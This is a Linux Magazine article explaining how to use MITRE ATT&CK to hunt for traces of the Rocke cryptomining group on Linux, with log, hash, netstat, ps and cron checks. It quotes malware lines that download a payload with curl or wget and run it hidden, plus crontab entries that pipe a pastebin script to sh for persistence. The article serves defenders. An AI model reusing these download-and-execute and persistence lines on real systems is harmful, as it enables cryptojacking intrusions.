Working with the MITRE ATT&CK knowledge base
Detective Work
The MITRE ATT&CK website keeps information on attackers and intrusion techniques. We'll show you how to use that information to look for evidence of an attack.
Security has many facets and angles, and if you really want to be safe, you need to be aware of them all. One important skill is to become familiar with the logfiles on your system and the information they might reveal (see the box entitled "All About Logs"). But the attackers have become increasingly sophisticated in recent years, and to stay ahead of them, you need all the help you can get. Another important source of information is the MITRE ATT&CK website [1]. MITRE ATT&CK is a structured, globally available knowledge base describing tactics and attackers. In addition to tracking the various attack methods used in the wild, MITRE ATT&CK also provides clues that will help you look for evidence.
About Logs
Linux systems store data in logfiles. You can specify four main categories of logs: applications, events, services, and systems. Most logs are stored as text. Entries typically include important information such as: time, type, and severity levels of the event, as well as the name of the process and the Process ID (PID). Of course, there are also exceptions, such as wtmp
or lastlog
which have a binary format. Generally, files with logos are available in the /var/log
directory, but not always. It happens that some programs save their diary files in other places.
In the event that systemd
operates on your Linux system, many users reach for the journalctl
command, which displays the messages of the systemd
recorder.
When diagnosing problems or errors, the first thing you need to do is to check the logs. Searching for something in logs can be boring and time consuming. That is why many users prefer to use simple twists in the Bash shell. Text processing commands like grep
and awk
are popular tools for searching out log information. These tools are especially useful for quick, one-liner queries. The use of scripts will save time and make it easier to extract valuable data from logs.
An example of a simple uniform script is:
grep -E -r -o "([0-9]{1,3}\.){3}[0-9]{1,3}" | sort | uniq | grep -E -o "([0-9]{1,3}\.){3}[0-9]{1,3}" > our-data.txt
The grep
command uses a regular expression (the -e
switch allows you to search with regex) to search data in the catalogs recursively (switch -R
) and then displays the matched data parts in a separate line. The sort
command sorts data, and the uniq
command deletes duplicates. Then the result of this operation is saved to the our-data.txt
file.
Searching for Evidence
It's best to learn from examples. One threat facing users today is attacks related to stealing system resources for the purposes of mining cryptocurrency. The techniques that hackers use are quite interesting and sometimes unconventional. The Rocke group is a good example. Rocke is a Chinese group of cyber criminals who specialize in malware attacks to gain access for crypto mining [2][3][4][5]. This group has been operating since 2018 and is dynamically developing its arsenal. The group evolves quickly and changes its techniques. Analysis of a Rocke group attack is not as easy as it might seem, but luckily, you can turn to the MITRE ATT&CK framework. Some of the techniques that MITRE ATT&CK associates with the Rocke group include:
- T1036.005 – Masquerading: Match Legitimate Name or Location
- T1053.003 – Scheduled Task/Job: Cron
- T1574.006 – Hijack Execution Flow: Dynamic Linker Hijacking
The following sections takes a closer look at these techniques and what to do about them, but before delving into the details, remember that it is always a good idea to look for suspicious files.
Malware often creates files in the following directories:
/usr/local
/usr/sbin
/tmp
It is worth looking at these locations and checking if there are suspicious files in them. You might find file names similar to the correct ones, and sometimes a file might be generated automatically and take a series of numbers. It is good to check the hash of these files. If the hash is different from what it is supposed to be, that is an indication that the file has been replaced or tampered with. You can use the VirusTotal platform [6] to check whether the hash is what it is supposed to be. The following command will find every executable file and check its control sum (SHA256), and the results will be saved to the list.txt
file:
find -type f -exec sha256sum '{}' \; > list.txt
T1036.005: Masquerading
Suppose the group downloads a payload using the curl
or wet
command. The configuration file and the malware binary file are saved in the /tmp
directory called kthrotlds
. The launch malware is using the nohup
command, rejecting the output data and enabling the background binary file to be made. Performing this process is a form of masking. The system will constantly perform a process called kthrotlds
, but the processes will not use binary files in the /tmp
folder.
Listing 1 shows part of the malicious code.
Listing 1
Malicious Code
01 if [ ${ARCH}x = "x86_64x" ]; then 02 (curl -fsSL hxxp://sowcar[].]com/t6/678/1552060180x1822611359.jpg -o \ 03 /tmp/kthrotlds||wget -q hxxp://sowcar[].]com/t6/678/1552060180x1822611359.jpg -O \ 04 /tmp/kthrotlds) && chmod +x /tmp/kthrotlds 05 elif [ ${ARCH}x = "i686x" ]; then 06 (curl -fsSL hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -o \ 07 /tmp/kthrotlds||wget -q hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -O \ 08 /tmp/kthrotlds) && chmod +x /tmp/kthrotlds 09 else 10 (curl -fsSL hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -o \ 11 /tmp/kthrotlds||wget -q hxxp://sowcar[.]com/t6/678/1552060225x1822611359.jpg -O \ 12 /tmp/kthrotlds) && chmod +x /tmp/kthrotlds 13 fi 14 nohup /tmp/kthrotlds >/dev/null 2>&1 &
By default, Linux does not log information on open ports and connections. However, netstat
comes to the rescue:
netstat -tupln
This command will return information on connections (port and IP address) to and from the system. You can trace the connections that are set and then track down the most undesirable ones.
Another way to check for a masked process is with the ps
command:
ps auxf
This command will display a list of processes running in the system. A malicious process often appears in square brackets, meaning that there are no arguments at the command line and it is possibly running as a thread.
T1053.003 – Cron
Hackers use a variety of techniques to achieve persistent access to the system after restarting. One of these methods is to add tasks to the cron tool. Cron allows you to plan your tasks and gives you the ability to follow commands according to the schedule without logging into the system. Listing 2 shows a few crontab
entries that could execute malicious code.
Listing 2
Crontab Entries
01 "*/10 * * * * root (curl -fsSL hxxps://pastebin[.]com/raw/1NtRkBc3||wget -q -O- hxxps://pastebin[.]com/raw/1NtRkBc3)|sh 02 ##" 03 04 "*/15 * * * * (curl -fsSL hxxps://pastebin[.]com/raw/1NtRkBc3||wget -q -O- hxxps://pastebin[.]com/raw/1NtRkBc3)|sh 05 ##"
In this case, the attacker does two things:
- Adds a new
crontab
entry that points to a malicious script. - Places the malicious script in a folder, which will allow it to execute at a specific time defined in the
crontab
entry.
That is why it is always worth checking cron tasks to look for suspicious entries:
crontab -l
Malware can manipulate the cron utility in various ways, therefore it is also worth looking at the following locations:
/var/spool/cron/root
/var/spool/cron/crontabs/root
/etc/cron.d/root
/etc/cron.hourly/oanacroner
/etc/cron.daily/oanacroner
/etc/cron.monthly/oanacroner
Or perform a search to find other cron-related files and directories on your system.
Buy this article as PDF
(incl. VAT)
Buy Linux Magazine
Subscribe to our Linux Newsletters
Find Linux and Open Source Jobs
Subscribe to our ADMIN Newsletters
Support Our Work
Linux Magazine content is made possible with support from readers like you. Please consider contributing when you’ve found an article to be beneficial.
News
-
TUXEDO Computers Unveils Linux Laptop Featuring AMD Ryzen CPU
This latest release is the first laptop to include the new CPU from Ryzen and Linux preinstalled.
-
XZ Gets the All-Clear
The back door xz vulnerability has been officially reverted for Fedora 40 and versions 38 and 39 were never affected.
-
Canonical Collaborates with Qualcomm on New Venture
This new joint effort is geared toward bringing Ubuntu and Ubuntu Core to Qualcomm-powered devices.
-
Kodi 21.0 Open-Source Entertainment Hub Released
After a year of development, the award-winning Kodi cross-platform, media center software is now available with many new additions and improvements.
-
Linux Usage Increases in Two Key Areas
If market share is your thing, you'll be happy to know that Linux is on the rise in two areas that, if they keep climbing, could have serious meaning for Linux's future.
-
Vulnerability Discovered in xz Libraries
An urgent alert for Fedora 40 has been posted and users should pay attention.
-
Canonical Bumps LTS Support to 12 years
If you're worried that your Ubuntu LTS release won't be supported long enough to last, Canonical has a surprise for you in the form of 12 years of security coverage.
-
Fedora 40 Beta Released Soon
With the official release of Fedora 40 coming in April, it's almost time to download the beta and see what's new.
-
New Pentesting Distribution to Compete with Kali Linux
SnoopGod is now available for your testing needs
-
Juno Computers Launches Another Linux Laptop
If you're looking for a powerhouse laptop that runs Ubuntu, the Juno Computers Neptune 17 v6 should be on your radar.